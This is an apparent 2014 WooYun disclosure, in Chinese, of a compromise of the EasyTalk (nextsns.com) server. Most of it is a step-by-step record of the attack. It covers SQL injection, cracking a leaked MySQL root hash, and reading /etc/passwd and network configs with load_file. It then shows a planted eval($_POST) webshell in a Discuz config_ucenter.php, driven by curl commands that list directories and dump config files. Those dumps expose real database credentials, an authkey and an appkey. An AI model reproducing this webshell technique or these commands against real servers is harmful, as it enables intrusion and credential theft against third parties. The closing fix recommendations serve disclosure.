当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-050756

漏洞标题:EasyTalk官网主站sql注入(可沦陷服务器)

相关厂商:nextsns.com

漏洞作者: 秋风

提交时间:2014-02-12 16:52

修复时间:2014-03-29 16:52

公开时间:2014-03-29 16:52

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-02-12: 细节已通知厂商并且等待厂商处理中
2014-02-12: 厂商已经确认,细节仅向厂商公开
2014-02-22: 细节向核心白帽子及相关领域专家公开
2014-03-04: 细节向普通白帽子公开
2014-03-14: 细节向实习白帽子公开
2014-03-29: 细节向公众公开

简要描述:

加强安全意识。。。。。。

详细说明:

qiufeng@ubuntu:/tmp$ ping www.nextsns.com
PING www.nextsns.com (58.49.57.112) 56(84) bytes of data.
64 bytes from 58.49.57.112: icmp_req=1 ttl=55 time=17.4 ms


http://www.nextsns.com:80/et/?hjoeson*
存在sql注入,可注出数据

mysql超级管理员密码泄露
root *4C5F36D8E964919[马赛克]687CF45CF4CD3A2C
可远程登陆,上cmd5得明文 yo********n3
mysql -uroot -h 58.49.57.112 -p 
select load_file("/etc/passwd");
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
mysql:x:500:500::/home/mysql:/sbin/nologin
www:x:501:501::/home/www:/sbin/nologin
select load_file("/etc/sysconfig/network-scripts/ifcfg-eth0")
DEVICE=eth0
BOOTPROTO=none
HWADDR=bc:ae:c5:5f:18:81
NM_CONTROLLED=yes
ONBOOT=yes
TYPE=Ethernet
UUID="542e47b5-9841-43c1-8656-a7bc17229a58"
IPADDR=58.49.57.112
NETMASK=255.255.255.128
DNS2=202.103.44.150
GATEWAY=58.49.57.1
DNS1=202.103.24.68
IPV6INIT=no
USERCTL=no
select load_file("/etc/sysconfig/network-scripts/ifcfg-eth1");
DEVICE=eth1
BOOTPROTO=dhcp
HWADDR=BC:AE:C5:5F:17:90
NM_CONTROLLED=yes
ONBOOT=no
TYPE=Ethernet
UUID="dd967db4-77f0-41f8-8c18-91b5bed1959d"
IPV6INIT=no
USERCTL=no
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| etCms              |
| etauthsite         |
| etbbs              |
| etnew              |
| etwiki             |
| fengkuang          |
| fkcxhbbs           |
| mygame2            |
| mysql              |
| pcgame             |
| performance_schema |
| richman            |
| richman2           |
| webxiaohua         |
| xiaohua            |
| xiaohuaweb         |
| youxiqunbbs        |
+--------------------+
18 rows in set (0.02 sec)


youxiqunbbs数据库,pre_ucenter_applications表可拿uc_key,对应discuz论坛地址bbs.youxiqun.com
uc_key在手,服务器我有(还是那该死的/config/config_ucenter.php)!!!
#1打印目录
服务器貌似不支持scandir函数,只能用老方法获取了
可修改opendir函数值,遍历服务器

curl "http://bbs.youxiqun.com/config/config_ucenter.php" --data 'QF=$dh=opendir("/home/");while (false !== ($filename = readdir($dh))){$files[] = $filename;}sort($files);print_r($files);';
打印/home
Array
(
    [0] => .
    [1] => ..
    [2] => java
    [3] => lost+found
    [4] => mygame.tar.gz
    [5] => mysql
    [6] => richman.tar.gz
    [7] => richman2.tar.gz
    [8] => www
    [9] => wwwlogs
    [10] => xhmain.tar.gz
    [11] => xiaohua.tar.gz
    [12] => xiaohuadb.tar.gz
    [13] => youxiqunbbs.tar.gz
    [14] => youxiqunbbsdb.tar.gz
)
curl "http://bbs.youxiqun.com/config/config_ucenter.php" --data 'QF=$dh=opendir("/home/www");while (false !== ($filename = readdir($dh))){$files[] = $filename;}sort($files);print_r($files);';
打印/home/www
Array
(
    [0] => .
    [1] => ..
    [2] => .pki
    [3] => cxh.tar.gz
    [4] => fkcxh
    [5] => fkcxh1
    [6] => fkcxhbbs
    [7] => fkcxhbbs_ys
    [8] => html5
    [9] => nextsns.com
    [10] => penfu
    [11] => smile.zip
    [12] => webxiaohua
    [13] => youxiqunbbs
)
curl "http://bbs.youxiqun.com/config/config_ucenter.php" --data 'QF=$dh=opendir("/home/www/nextsns.com/download");while (false !== ($filename = readdir($dh))){$files[] = $filename;}sort($files);print_r($files);';
打印/home/www/nextsns.com/download
Array
(
    [0] => .
    [1] => ..
    [2] => EasyTalk_Development_Guide.pdf
    [3] => EasyTalk_X1.3.rar
    [4] => EasyTalk_X1.4.rar
    [5] => EasyTalk_X1.5.rar
    [6] => EasyTalk_X1.6.rar
    [7] => EasyTalk_X1.7.rar
    [8] => EasyTalk_X1.8.rar
    [9] => EasyTalk_X2.0.1.rar
    [10] => EasyTalk_X2.0.2.rar
    [11] => EasyTalk_X2.0.rar
    [12] => EasyTalk_X2.1.zip
    [13] => EasyTalk_X2.1_Beta2_20120813.zip
    [14] => EasyTalk_X2.2.1.zip
    [15] => EasyTalk_X2.2.2.zip
    [16] => EasyTalk_X2.2.zip
    [17] => EasyTalk_X2.3.zip
    [18] => EasyTalk_X2.4.zip
    [19] => EasyTalk_for_android_v1.0.apk
    [20] => EasyTalk_for_ios_v1.0.ipa
    [21] => EasyTalk_for_ios_v1.1.ipa
    [22] => EasyTalk_manual.pdf
    [23] => EasyTalk�����ĵ�.rar
    [24] => EasyTalk�ֻ����ز��ĵ�.docx
    [25] => EasyTalk���ݿ��ṹ.pdf
    [26] => EasyTalk΢����ʹ���ֲ�.pdf
    [27] => EasyTalkϵͳ�ṹ.pdf
    [28] => easytalk_php_sdk_v1.0.zip
    [29] => install_manual.rar
    [30] => msyh.ttf
    [31] => update_1.5.rar
    [32] => update_1.5_20110517.rar
    [33] => update_1.6.rar
    [34] => update_1.7.rar
    [35] => update_1.8.rar
    [36] => update_2.0.1.rar
    [37] => update_2.0.2.rar
    [38] => update_2.0.rar
)


#2 敏感信息文件

curl "http://bbs.youxiqun.com/config/config_ucenter.php" --data 'QF=print_r(file_get_contents("./config_ucenter.php"));'
<?php
define('UC_CONNECT', 'mysql');
define('UC_DBHOST', '127.0.0.1');
define('UC_DBUSER', 'root');
define('UC_DBPW', 'yo[马赛克]3');
define('UC_DBNAME', 'youxiqunbbs');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', '`youxiqunbbs`.pre_ucenter_');
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'utf-8');
define('UC_KEY', 'S2m9bcbfT4Ua[马赛克]AdTcxd0242g737dbe4kauaubn2pb');
define('UC_API', 'http://aaa');eval($_POST[QF]);//');
define('UC_APPID', '1');
define('UC_IP', '');
define('UC_PPP', 20);
curl "http://bbs.youxiqun.com/config/config_ucenter.php" --data 'QF=print_r(file_get_contents("./config_global.php"));'
<?php
$_config = array();
// ----------------------------  CONFIG DB  ----------------------------- //
$_config['db']['1']['dbhost'] = '127.0.0.1';
$_config['db']['1']['dbuser'] = 'root';
$_config['db']['1']['dbpw'] = 'y[马赛克]3';
$_config['db']['1']['dbcharset'] = 'utf8';
$_config['db']['1']['pconnect'] = '0';
$_config['db']['1']['dbname'] = 'youxiqunbbs';
$_config['db']['1']['tablepre'] = 'pre_';
$_config['db']['common']['slave_except_table'] = '';
$_config['db']['slave'] = '';
// --------------------------  CONFIG MEMORY  --------------------------- //
$_config['memory']['prefix'] = 'ayRtDS_';
$_config['memory']['redis']['server'] = '';
$_config['memory']['redis']['port'] = 6379;
$_config['memory']['redis']['pconnect'] = 1;
$_config['memory']['redis']['timeout'] = '0';
$_config['memory']['redis']['serializer'] = 1;
$_config['memory']['redis']['requirepass'] = '';
$_config['memory']['memcache']['server'] = '';
$_config['memory']['memcache']['port'] = 11211;
$_config['memory']['memcache']['pconnect'] = 1;
$_config['memory']['memcache']['timeout'] = 1;
$_config['memory']['apc'] = 1;
$_config['memory']['xcache'] = 1;
$_config['memory']['eaccelerator'] = 1;
$_config['memory']['wincache'] = 1;
// --------------------------  CONFIG SERVER  --------------------------- //
$_config['server']['id'] = 1;
// -------------------------  CONFIG DOWNLOAD  -------------------------- //
$_config['download']['readmod'] = 2;
$_config['download']['xsendfile']['type'] = '0';
$_config['download']['xsendfile']['dir'] = '/down/';
// ---------------------------  CONFIG CACHE  --------------------------- //
$_config['cache']['type'] = 'sql';
// --------------------------  CONFIG OUTPUT  --------------------------- //
$_config['output']['charset'] = 'utf-8';
$_config['output']['forceheader'] = 1;
$_config['output']['gzip'] = '0';
$_config['output']['tplrefresh'] = 1;
$_config['output']['language'] = 'zh_cn';
$_config['output']['staticurl'] = 'static/';
$_config['output']['ajaxvalidate'] = '0';
$_config['output']['iecompatible'] = '0';
// --------------------------  CONFIG COOKIE  --------------------------- //
$_config['cookie']['cookiepre'] = 'F57B_';
$_config['cookie']['cookiedomain'] = '';
$_config['cookie']['cookiepath'] = '/';
// -------------------------  CONFIG SECURITY  -------------------------- //
$_config['security']['authkey'] = 'd648ed1kHi0uJuZa';
$_config['security']['urlxssdefend'] = 1;
$_config['security']['attackevasive'] = '0';
$_config['security']['querysafe']['status'] = 1;
$_config['security']['querysafe']['dfunction']['0'] = 'load_file';
$_config['security']['querysafe']['dfunction']['1'] = 'hex';
$_config['security']['querysafe']['dfunction']['2'] = 'substring';
$_config['security']['querysafe']['dfunction']['3'] = 'if';
$_config['security']['querysafe']['dfunction']['4'] = 'ord';
$_config['security']['querysafe']['dfunction']['5'] = 'char';
$_config['security']['querysafe']['daction']['0'] = 'intooutfile';
$_config['security']['querysafe']['daction']['1'] = 'intodumpfile';
$_config['security']['querysafe']['daction']['2'] = 'unionselect';
$_config['security']['querysafe']['daction']['3'] = '(select';
$_config['security']['querysafe']['daction']['4'] = 'unionall';
$_config['security']['querysafe']['daction']['5'] = 'uniondistinct';
$_config['security']['querysafe']['daction']['6'] = 'uniondistinct';
$_config['security']['querysafe']['dnote']['0'] = '/*';
$_config['security']['querysafe']['dnote']['1'] = '*/';
$_config['security']['querysafe']['dnote']['2'] = '#';
$_config['security']['querysafe']['dnote']['3'] = '--';
$_config['security']['querysafe']['dnote']['4'] = '"';
$_config['security']['querysafe']['dlikehex'] = 1;
$_config['security']['querysafe']['afullnote'] = '0';
// --------------------------  CONFIG ADMINCP  -------------------------- //
// -------- Founders: $_config['admincp']['founder'] = '1,2,3'; --------- //
$_config['admincp']['founder'] = '1';
$_config['admincp']['forcesecques'] = '0';
$_config['admincp']['checkip'] = 1;
$_config['admincp']['runquery'] = '0';
$_config['admincp']['dbimport'] = 1;
// --------------------------  CONFIG REMOTE  --------------------------- //
$_config['remote']['on'] = '0';
$_config['remote']['dir'] = 'remote';
$_config['remote']['appkey'] = '62cf0b3c3e6a4c9468e7216839721d8e';
$_config['remote']['cron'] = '0';
// ---------------------------  CONFIG INPUT  --------------------------- //
$_config['input']['compatible'] = 1;
// -------------------  THE END  -------------------- //
?>

漏洞证明:

_829.png


11.jpg

修复方案:

1.对交互数据进行有效过滤
2.更新uc_key
3.建议关闭mysql对外网的访问权限
4.建议php应用不要直接使用root用户访问
5.EasyTalk源码建议托管到第三方,如google!

版权声明:转载请注明来源 秋风@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-02-12 17:03

厂商回复:

正在修复

最新状态:

暂无